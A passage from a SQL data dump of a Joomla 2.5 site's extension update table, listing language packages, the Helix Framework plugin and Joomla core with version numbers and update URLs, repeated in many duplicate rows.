Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1031,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1032,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1033,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1034,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1035,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1036,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(1037,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1038,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1039,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1040,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1041,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1042,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1043,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1044,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1045,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1046,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1047,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1048,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1049,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1050,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1051,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1052,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1053,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1054,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1055,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1056,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1057,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1058,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1059,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1060,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1061,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1062,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1063,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1064,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1065,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1066,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1067,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1068,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1069,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1070,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1071,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1072,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1073,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(1074,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1075,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1076,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1077,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1078,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1079,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1080,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1081,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1082,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1083,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1084,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1085,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1086,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1087,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1088,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1089,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1090,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1091,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1092,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1093,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1094,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1095,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1096,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1097,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1098,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1099,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1100,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1101,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1102,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1103,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1104,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1105,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1106,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1107,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1108,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1109,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1110,1,0,0,'Joomla','','joomla','file','',0,'2.5.24','','http://update.joomla.org/core/extension.xml',''),(1111,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1112,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1113,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1114,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1115,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1116,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1117,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1118,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1119,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1120,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1121,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1122,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1123,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1124,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1125,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1126,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1127,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1128,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1129,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1130,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1131,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1132,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1133,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1134,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1135,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1136,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1137,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1138,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1139,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1140,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1141,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1142,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1143,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1144,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1145,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1146,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1147,1,0,0,'Joomla','','joomla','file','',0,'2.5.24','','http://update.joomla.org/core/extension.xml',''),(1148,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1149,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1150,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1151,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1152,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1153,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1154,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1155,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1156,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1157,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1158,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1159,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1160,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1161,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1162,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1163,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1164,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1165,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1166,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1167,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1168,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1169,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1170,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1171,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1172,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1173,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1174,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1175,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1176,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1177,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1178,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1179,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1180,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1181,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1182,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1183,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1184,1,0,0,'Joomla','','joomla','file','',0,'2.5.24','','http://update.joomla.org/core/extension.xml',''),(1185,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1186,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1187,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1188,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1189,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1190,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1191,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1192,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1193,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1194,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1195,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1196,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1197,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1198,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1199,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1200,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1201,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1202,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1203,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1204,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1205,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1206,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1207,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1208,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1209,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1210,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1211,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1212,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1213,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1214,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1215,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1216,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1217,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1218,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1219,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1220,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1221,1,0,0,'Joomla','','joomla','file','',0,'2.5.24','','http://update.joomla.org/core/extension.xml',''),(1222,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1223,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1224,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1225,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1226,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1227,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1228,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1229,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1230,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1231,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1232,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1233,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1234,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1235,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1236,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1237,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1238,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1239,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1240,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1241,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1242,3,0,0,'Serbian 